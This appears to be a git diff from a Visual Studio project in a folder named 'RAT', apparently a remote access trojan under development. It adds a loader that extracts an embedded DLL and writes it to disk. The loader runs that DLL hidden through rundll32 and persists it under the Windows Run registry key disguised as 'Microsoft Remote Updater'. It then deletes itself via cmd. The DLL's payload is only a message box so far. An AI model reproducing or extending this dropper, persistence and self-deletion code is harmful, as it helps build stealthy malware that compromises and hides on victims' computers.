diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj
index 2be397b..18ce4a4 100644
Binary files a/Debug/FunDLL.iobj and b/Debug/FunDLL.iobj differ
diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb
index e9521e9..2099e96 100644
Binary files a/Debug/FunDLL.ipdb and b/Debug/FunDLL.ipdb differ
diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb
index 5cc9330..5df122a 100644
Binary files a/Debug/FunDLL.pdb and b/Debug/FunDLL.pdb differ
diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb
index 3afe78f..c69c382 100644
Binary files a/Debug/Injector.pdb and b/Debug/Injector.pdb differ
diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb
index 7442067..693e8ed 100644
Binary files a/Debug/Loader.pdb and b/Debug/Loader.pdb differ
diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log
index a7d3ee7..5e221a8 100644
--- a/Dll/Debug/Dll.log
+++ b/Dll/Debug/Dll.log
@@ -1,5 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
+ fundll.cpp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Generating code
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog
index b1f5512..4682923 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog
index cecb9a2..b4bb458 100644
Binary files a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog and b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog differ
diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb
index c1fb6af..6039950 100644
Binary files a/Dll/Debug/vc141.pdb and b/Dll/Debug/vc141.pdb differ
diff --git a/Dll/Dll.vcxproj b/Dll/Dll.vcxproj
index 8574aaf..439f48f 100644
--- a/Dll/Dll.vcxproj
+++ b/Dll/Dll.vcxproj
@@ -31,7 +31,7 @@
DynamicLibrary
true
v141_xp
- Unicode
+ MultiByte
true
diff --git a/Dll/fundll.cpp b/Dll/fundll.cpp
index 5882e98..2eab02b 100644
--- a/Dll/fundll.cpp
+++ b/Dll/fundll.cpp
@@ -6,14 +6,18 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
break;
case DLL_PROCESS_DETACH:
-
+
break;
default:
-
+
break;
}
+ return 1;
}
extern "C" __declspec(dllexport) int FunEntry() {
- return MessageBoxA(0, "Hello from C2", 0, 0);
+ char exe[MAX_PATH + 1];
+ GetModuleFileNameA(0, exe, sizeof(exe));
+ MessageBoxA(0, exe, "I am inside: ", 0);
+ return 0;
}
\ No newline at end of file
diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk
index b2ac90c..5de5b6b 100644
Binary files a/Injector/Debug/Injector.ilk and b/Injector/Debug/Injector.ilk differ
diff --git a/Injector/Debug/Injector.log b/Injector/Debug/Injector.log
index 198e2b0..d66fb90 100644
--- a/Injector/Debug/Injector.log
+++ b/Injector/Debug/Injector.log
@@ -1,2 +1,2 @@
- LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link
+ injector.cpp
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
diff --git a/Injector/Debug/Injector.tlog/link.read.1.tlog b/Injector/Debug/Injector.tlog/link.read.1.tlog
index 4a6fd2d..4073d96 100644
Binary files a/Injector/Debug/Injector.tlog/link.read.1.tlog and b/Injector/Debug/Injector.tlog/link.read.1.tlog differ
diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb
index a02dcd8..71e54e2 100644
Binary files a/Injector/Debug/vc143.idb and b/Injector/Debug/vc143.idb differ
diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb
index bc03652..c2807b3 100644
Binary files a/Injector/Debug/vc143.pdb and b/Injector/Debug/vc143.pdb differ
diff --git a/Loader/Debug/Loader.log b/Loader/Debug/Loader.log
index edac3ef..d7e0545 100644
--- a/Loader/Debug/Loader.log
+++ b/Loader/Debug/Loader.log
@@ -1,2 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
+cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
+ loader.cpp
+ tools.cpp
+ Generating Code...
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
diff --git a/Loader/Debug/Loader.tlog/link.command.1.tlog b/Loader/Debug/Loader.tlog/link.command.1.tlog
index 1aeeb1c..b536724 100644
Binary files a/Loader/Debug/Loader.tlog/link.command.1.tlog and b/Loader/Debug/Loader.tlog/link.command.1.tlog differ
diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog
index 62b1f8e..f03f114 100644
Binary files a/Loader/Debug/Loader.tlog/link.read.1.tlog and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ
diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb
index 8f184aa..02fe3bb 100644
Binary files a/Loader/Debug/vc141.pdb and b/Loader/Debug/vc141.pdb differ
diff --git a/Loader/Loader.vcxproj b/Loader/Loader.vcxproj
index 0e0d345..6c22cec 100644
--- a/Loader/Loader.vcxproj
+++ b/Loader/Loader.vcxproj
@@ -96,7 +96,7 @@
Windows
true
- kernel32.lib;user32.lib
+ kernel32.lib;user32.lib;advapi32.lib
diff --git a/Loader/loader.cpp b/Loader/loader.cpp
index 35af249..ea2b25e 100644
--- a/Loader/loader.cpp
+++ b/Loader/loader.cpp
@@ -4,7 +4,7 @@
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
PBYTE module_base = PBYTE(Tools::GetImageBase());
if (module_base != ERROR) {
- // extract payload from section move to %appdata% with random name
+ // extract payload from section
DWORD module_size = NULL;
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
@@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
if (new_file != INVALID_HANDLE_VALUE) {
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
}
+ CloseHandle(new_file);
+ }
+ LocalFree(dll_memory);
+
+ // runs the dll after extraction
+ WCHAR win_path[MAX_PATH];
+ if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) {
+ if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) {
+ lstrcatW(win_path, appdata_path);
+ lstrcatW(win_path, L",");
+ lstrcatW(win_path, L"FunEntry");
+
+ STARTUPINFO startup_inf{ 0 };
+ PROCESS_INFORMATION process_information{ 0 };
+ startup_inf.cb = sizeof(startup_inf);
+
+ BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information);
+
+ if (b) {
+ HKEY reg_key;
+ LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, ®_key);
+ if (bb == ERROR_SUCCESS) {
+ RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path));
+ RegCloseKey(reg_key);
+ }
+ //WaitForSingleObject(process_information.hProcess, INFINITE);
+ //CloseHandle(process_information.hProcess);
+ }
+ }
+ }
+ }
+
+ // delete loader
+ WCHAR del_cmd[MAX_PATH];
+ if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) {
+ if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) {
+ WCHAR app_name[MAX_PATH];
+ GetModuleFileNameW(0, app_name, MAX_PATH);
+ lstrcatW(del_cmd, L"/c del \"");
+ lstrcatW(del_cmd, app_name);
+ lstrcatW(del_cmd, L"\"");
+
+ STARTUPINFO sii{ 0 };
+ PROCESS_INFORMATION pii{ 0 };
+ sii.cb = sizeof(sii);
+
+ CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii);
+ return 0;
}
}
}
\ No newline at end of file